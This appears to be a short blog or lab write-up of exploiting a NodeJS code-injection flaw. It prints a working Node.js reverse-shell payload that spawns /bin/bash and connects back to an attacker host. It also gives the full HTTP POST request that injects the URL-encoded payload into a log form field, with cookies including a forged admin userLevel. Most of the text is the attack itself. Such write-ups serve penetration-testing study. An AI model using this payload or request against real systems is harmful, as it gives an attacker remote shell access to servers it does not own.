Exploitation

NodeJS Code Injection

Nodejs RCE and a simple reverse shelli break software - My work with different software, bug hunting and interesting tidbits

Since we already saw that the website was vulnerable to NodeJS command injection. We copied the following line of code.

var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attacker-ip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});

Changing the script to connect to port 3000 and changing out listening host to our IP. Would result in a reverse shell.

Request Used:

POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 344
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=hjb&msg=var+net+%3D+require%28%22net%22%29%2C+sh+%3D+require%28%22child_process%22%29.exec%28%22%2Fbin%2Fbash%22%29%3B%0D%0Avar+client+%3D+new+net.Socket%28%29%3B%0D%0Aclient.connect%283000%2C+%22192.168.49.135%22%2C+function%28%29%7Bclient.pipe%28sh.stdin%29%3Bsh.stdout.pipe%28client%29%3B%0D%0Ash.stderr.pipe%28client%29%3B%7D%29%3B